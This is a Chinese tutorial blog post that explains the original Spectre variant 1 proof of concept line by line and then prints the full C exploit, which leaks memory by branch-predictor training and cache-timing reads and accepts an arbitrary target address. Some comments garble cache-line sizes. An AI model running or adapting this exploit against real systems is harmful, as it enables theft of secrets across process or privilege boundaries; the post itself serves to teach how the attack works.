• intel:spectre&Meltdown侧信道攻击(二)


      上面一篇介绍了spectre&meltdown基本原理和简单的demo方案,今天继续学习一下该漏洞发现团队原始的POC:https://spectreattack.com/spectre.pdf 

      1、先展示一下运行结果,便于有个直观的认识:从打印的结果来看,成功猜测出了secret字符串的内容;

      

       2、下面详细解读代码

          (1)整个漏洞利用核心的两个函数:rdtscp和clflush都在这两个头文件里申明了;

    #ifdef _MSC_VER
    #include <intrin.h> /* for rdtscp and clflush */
    #pragma optimize("gt", on)
    #else
    #include <x86intrin.h> /* for rdtscp and clflush */
    #endif

      (2)array1:attacker用来访问victim的数组。这里申明了160字节,但后续会用很大的数跨越数组定义时的边界限制,达到访问victim内存的目的

                    unuesed1和unused2:多核cpu,每个核都有各自的L1和L2缓存;缓存以line作为基本的单元,每个cache line有64字节;unuesed1和unuesed2刚好填满2个cache line,array1占用3个cache line;

       这3个数组一共占用5个不同的cache line;

          array2:secret每个单位是1byte,大小不超过255,所以“横坐标”最大256;  每个cache line是64byte(最小缓存单元),也就是512bit,所以“纵坐标”是512;

    uint8_t unused1[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
    uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };//a shared memory space between the victim and the attacker
    uint8_t unused2[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
    uint8_t array2[256 * 512];//(1)secret每个单位1字节,数字大小不超过255;(2)L1的单个cache line大小64K = 512bit,这里可存储256个不同的cache line (3)shared with the attacker and victim

                       

       (3)这个是victim的数据,也就是需要爆破的数据;

    char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

      (4)通过array1申明的长度是160,但后面某些时候会传入远大于160的数,越界访问secret的内容后存入缓存。后面即使if条件不成立,cpu回退寄存器的状态,但是的缓存仍然还在

    uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
    // In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
    void victim_function(size_t x)
    {
        if (x < array1_size)//array1_size不在缓存,需要从内存读,很耗时,cpu先行执行下面的语句
        {
            temp &= array2[array1[x] * 512];//array1长度是160,但x可以远超160,比如main里面定义malicious_x,这样就进入secret的存储空间
        }
    }

      (5)判断cache是否命中的阈值,这个值是多次实验得到的,不是理论推导出来的;

    #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold:80是多次实验测试得到的,不是某些理论推导出来的 */

      (6)保存缓存是否命中结果

    for (i = 0; i < 256; i++)
            results[i] = 0;

      (7)array2每个元素如果已经在cpu的缓存,全部清除,避免影响后续计时;

    for (i = 0; i < 256; i++)//每个元素的缓存都清零
                _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

      (8)把array1_size从cpu缓存去除;紧接着的这个空转为了确保array1_size的从cpu缓存清除;

     _mm_clflush(&array1_size);//array1_size从缓存去除
     for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it;volatile强制cpu从内存读取Z的值,否则这个空转可能被编译器优化
     {/* Delay (can also mfence),也可以用 mfence 替代*/
     } 

      (9)这里计算array1的偏移坐标,方法很复杂,单看代码很难理解为啥这么做,不妨先打印一些结果数据看看:

    x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
    x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
    x = training_x ^ (x & (malicious_x ^ training_x));
        构造的x如下:很有规律,每6次一个轮回;每个轮回前5次的x都是7,在arry1_size的范围内,if条件是成立的;最后一个远大于arry1_size,导致if条件失效;但CPU有分支预测功能,会根据该
    if分支附近或前面几个分支预测下一个if分支是否成立。前面5个分支都是成立的,会“诱导”cpu认为第6次if也成立,进而提前执行
    temp &= array2[array1[x] * 512]的代码,把victim的内存读到cpu
    内部缓存; 然后就是执行victim_funtion();
    j=23 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=22 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=21 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=20 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=19 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=18 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
    j=17 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=16 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=15 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=14 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=13 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=12 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224

       (10)victim_function执行完后,重新从array2读数据,并计时;耗时最短的说明在victim中存的就是这个;

    /* Time reads. Order is lightly mixed up to prevent stride prediction */
            for (i = 0; i < 256; i++)
            {    
                mix_i = ((i * 167) + 13) & 255;//1、打乱读取byte的顺序,避免cpu猜测和优化byte的读取  2、&255=&FF,只保留低8bit,效果相当于%255(小于255)或%255-1(大于255)
                addr = &array2[mix_i * 512];
                time1 = __rdtscp(&junk); /* READ TIMER */
                junk = *addr; /* MEMORY ACCESS TO TIME */
                time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
                if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                    results[mix_i]++; /* cache hit - add +1 to score for this value */
            }

      (11)接下来就是排序,找出耗时最短的2个数字;

    /* Locate highest & second-highest results results tallies in j/k */
            j = k = -1;
            for (i = 0; i < 256; i++)
            {
                if (j < 0 || results[i] >= results[j])
                {
                    k = j;
                    j = i;
                }
                else if (k < 0 || results[i] >= results[k])
                {
                    k = i;
                }
            }
            if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
                break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
        }
        results[0] ^= junk; /* use junk so code above won't get optimized out*/
        value[0] = (uint8_t)j;
        score[0] = results[j];
        value[1] = (uint8_t)k;
        score[1] = results[k];

      (12)继续看main:这个就是从arry1到目标内存的offset:

    size_t malicious_x = (size_t)(secret - (char*)array1); 

           紧接着会传入readMemoryByte函数去探测读取内容:

    printf("Reading at malicious_x = %p... ", (void*)malicious_x);
            readMemoryByte(malicious_x++, value, score);

      (13)和https://www.cnblogs.com/theseventhson/p/13282921.html 这个POC比,这个demo多了两个功能:

    •  训(诱)练(导)cpu的分支预测结果,让其认为下一个if条件是成立的,提前执行if分支
    •    不仅仅能探测secret内容,还能让用户指定需要探测的目标地址和探测的数据长度,如下:
        if (argc == 3)//第一个参数是目标地址,第二个参数是读取的字节数;
        {
            sscanf_s(argv[1], "%p", (void**)(&malicious_x));
            malicious_x -= (size_t)array1; /* Convert input value into a pointer;*/
            sscanf_s(argv[2], "%d", &len);
            printf("Trying malicious_x = %p, len = %d
    ", (void*)malicious_x, len);
        }

     完整的代码如下(精华都在注释了):

    #include <stdio.h> 
    #include <stdint.h>
    #include <string.h>
    #ifdef _MSC_VER
    #include <intrin.h> /* for rdtscp and clflush */
    #pragma optimize("gt", on)
    #else
    #include <x86intrin.h> /* for rdtscp and clflush */
    #endif
    
    /* sscanf_s only works in MSVC. sscanf should work with other compilers */
    #ifndef _MSC_VER
    #define sscanf_s sscanf
    #endif
    
    /********************************************************************
    Victim code.
    ********************************************************************/;
    unsigned int array1_size = 16;
    uint8_t unused1[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
    uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };//a shared memory space between the victim and the attacker
    uint8_t unused2[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
    uint8_t array2[256 * 512];//(1)secret每个单位1字节,数字大小不超过255;(2)L3的单个cache line大小64K = 512bit,这里可存储256个不同的cache line (3)shared with the attacker and victim
    
    char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover
    
    uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
    // In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
    void victim_function(size_t x)
    {
        if (x < array1_size)//array1_size不在缓存,需要从内存读,很耗时,cpu先行执行下面的语句
        {
            temp &= array2[array1[x] * 512];//array1长度是160,但x可以远超160,比如main里面定义malicious_x,这样就进入secret的存储空间
        }
    }
    
    /********************************************************************
    Analysis code
    ********************************************************************/
    #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold:80是多次实验测试得到的,不是某些理论推导出来的 */
    
    /* Report best guess in value[0] and runner-up in value[1] */
    void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
    {
        static int results[256];//内存单元读取的时间
        int tries, i, j, k, mix_i;
        unsigned int junk = 0;
        size_t training_x, x;
        register uint64_t time1, time2;
        volatile uint8_t* addr;
    
        for (i = 0; i < 256; i++)
            results[i] = 0;
        for (tries = 999; tries > 0; tries--)
        {
            /* Flush array2[256*(0..255)] from cache */
            for (i = 0; i < 256; i++)//每个元素的缓存都清零
                _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
    
            /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
            training_x = tries % array1_size;//training_x = 0~15
            for (j = 29; j >= 0; j--)
            {
                _mm_clflush(&array1_size);//array1_size从缓存去除
                for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it;volatile强制cpu从内存读取Z的值,否则这个空转可能被编译器优化
                {/* Delay (can also mfence),也可以用 mfence 替代*/
                } 
                /*每循环6次,其中5次产生较小的x,让if条件成立;第6次产生超大、让if不成立的x,但由于前5次的x都成立,cpu还是会预先执行if分支。前面5次小x就是用来训练cpu分支预测的,以达到第6次“欺骗”的目的*/
                /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
                /* Avoid jumps in case those tip off the branch predictor */
                x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
                x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
                x = training_x ^ (x & (malicious_x ^ training_x));
    
                /* Call the victim! */
                victim_function(x);//x是相对arry1的偏移,可以深入secret数组探查;
            }
    
            /* Time reads. Order is lightly mixed up to prevent stride prediction */
            for (i = 0; i < 256; i++)
            {    
                mix_i = ((i * 167) + 13) & 255;//1、打乱读取byte的顺序,避免cpu猜测和优化byte的读取  2、&255=&FF,只保留低8bit,效果相当于%255(小于255)或%255-1(大于255)
                addr = &array2[mix_i * 512];
                time1 = __rdtscp(&junk); /* READ TIMER */
                junk = *addr; /* MEMORY ACCESS TO TIME */
                time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
                if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                    results[mix_i]++; /* cache hit - add +1 to score for this value */
            }
    
            /* Locate highest & second-highest results results tallies in j/k */
            j = k = -1;
            for (i = 0; i < 256; i++)
            {
                if (j < 0 || results[i] >= results[j])
                {
                    k = j;
                    j = i;
                }
                else if (k < 0 || results[i] >= results[k])
                {
                    k = i;
                }
            }
            if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
                break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
        }
        results[0] ^= junk; /* use junk so code above won't get optimized out*/
        value[0] = (uint8_t)j;
        score[0] = results[j];
        value[1] = (uint8_t)k;
        score[1] = results[k];
    }
    
    int main(int argc, const char** argv)
    {
        printf("Putting '%s' in memory, address %p
    ", secret, (void*)(secret));
        size_t malicious_x = (size_t)(secret - (char*)array1); /* default for malicious_x,array1到secret的距离,包括array2[256 * 512]、unused2[64]、array1[160] */
        int score[2], len = strlen(secret);
        uint8_t value[2];
    
        for (size_t i = 0; i < sizeof(array2); i++)//array2[256 * 512]
            array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
        if (argc == 3)//第一个参数是目标地址,第二个参数是读取的字节数;
        {
            sscanf_s(argv[1], "%p", (void**)(&malicious_x));
            malicious_x -= (size_t)array1; /* Convert input value into a pointer;*/
            sscanf_s(argv[2], "%d", &len);
            printf("Trying malicious_x = %p, len = %d
    ", (void*)malicious_x, len);
        }
    
        printf("Reading %d bytes:
    ", len);
        while (--len >= 0)
        {
            printf("Reading at malicious_x = %p... ", (void*)malicious_x);
            readMemoryByte(malicious_x++, value, score);
            printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
            printf("0x%02X='%c' score=%d ", value[0],
                (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
            if (score[1] > 0)
                printf("(second best: 0x%02X='%c' score=%d)", value[1],
                    (value[1] > 31 && value[1] < 127 ? value[1] : '?'),
                    score[1]);
            printf("
    ");
        }
    #ifdef _MSC_VER
        printf("Press ENTER to exit
    ");
        getchar();    /* Pause Windows console */
    #endif
        return (0);
    }

    参考:https://www.fortinet.com/blog/threat-research/into-the-implementation-of-spectre 代码解读

              https://bbs.pediy.com/thread-254288.htm     https://xz.aliyun.com/t/6332  跨进程泄露敏感信息

              https://bbs.pediy.com/thread-256190.htm  Intel处理器L3 Cache侧信道分析研究 

     

  • 相关阅读:
    android 设置时间和日期
    android 对话框
    android notification 通知
    android 动画(转载)
    js的作用域题
    js高级
    js中级6
    js中级小知识5
    js中级小知识4
    js中级小知识3
  • 原文地址:https://www.cnblogs.com/theseventhson/p/13296154.html
Copyright © 2020-2023  润新知